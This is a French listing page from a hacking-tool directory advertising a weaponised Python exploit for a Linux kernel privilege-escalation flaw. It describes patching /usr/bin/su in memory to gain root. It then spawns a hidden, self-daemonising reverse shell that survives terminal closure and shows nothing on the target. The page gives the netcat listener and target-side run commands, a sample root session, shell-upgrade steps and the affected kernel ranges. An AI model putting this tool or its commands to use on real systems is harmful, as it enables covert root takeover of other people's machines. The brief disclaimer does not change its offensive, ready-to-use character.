Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-31431-REVSHELL — Exploit Python armé pour CVE-2026-31431, enchaînant une élévation de privilèges du noyau Linux vers un reverse shell root démonisé avec PTY complet, en patchant /usr/bin/su en mémoire. | Kitploit
Outils/GitHubGitHub/danimrtzp/cve-2026-31431-revshell
Escalade de PrivilègesFrameworks d'ExploitationAnalyse des VulnérabilitésExploitationPost-ExploitationTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubdanimrtzp/cve-2026-31431-revshell

CVE-2026-31431-REVSHELL

Exploit Python armé pour CVE-2026-31431, enchaînant une élévation de privilèges du noyau Linux vers un reverse shell root démonisé avec PTY complet, en patchant /usr/bin/su en mémoire.

Voir le dépôt
19il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager


  █▀▀ ▄▀█ █ █   █▀█ █▀█ █▀█ ▀█▀
  █▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░

  CVE-2026-31431  •  Linux Kernel LPE  →  Root Reverse Shell

Vue d'ensemble

FailRoot est un exploit armé pour CVE-2026-31431 — une écriture hors limites dans le sous-système crypto: algif_aead du noyau Linux.

Il enchaîne une élévation de privilèges avec un reverse shell root daemonisé avec PTY complet :

AF_ALG + splice()  →  écriture de 4 octets dans le cache de pages  →  patch de /usr/bin/su  →  root

L'exploit entier tient dans un seul fichier. Aucune compilation. Aucune dépendance externe. Aucune trace sur le disque — le binaire su est patché uniquement en mémoire.


Ce qu'il fait

  1. Se daemonise instantanément — double fork, détachement du terminal, retour immédiat de l'invite
  2. Charge les modules du noyau — algif_aead + authencesn via plusieurs stratégies de repli
  3. Exploite CVE-2026-31431 — écrit 4 octets contrôlés dans le cache de pages de /usr/bin/su
  4. Génère un reverse shell PTY root — pty.spawn("/usr/bin/su") → TTY root entièrement interactif

Le reverse shell survit à la fermeture du terminal (SIGHUP ignoré), n'affiche aucune sortie sur la cible, et se reconnecte avec des tentatives pendant jusqu'à 3 minutes.


Utilisation

# Attaquant — démarrer l'écouteur :
nc -lvnp 4444

# Cible — exécuter l'exploit (rien ne s'affichera, il se daemonise instantanément) :
python3 exploit.py <IP_ATTAQUANT> 4444
attaquant ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234

root@victime:~# id
uid=0(root) gid=0(root) groups=0(root)

Amélioration du TTY (côté attaquant, dans le shell)

Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash

Noyaux affectés

DeÀ (exclusif)
4.145.10.254
5.115.15.204
5.166.1.170
6.26.6.137
6.76.12.85
6.136.18.22
6.196.19.12
7.0rc1–rc6

Prérequis

  • Python >= 3.10 (os.splice())
  • Accès en lecture à /usr/bin/su (lisible par tous sur toutes les distributions)
  • Modules du noyau algif_aead et authencesn disponibles
  • Aucun sudo requis

Auteur

danimrtzp


Avertissement

Pour la recherche en sécurité et l'éducation autorisées uniquement. Toute utilisation abusive est illégale.

Télécharger l’outil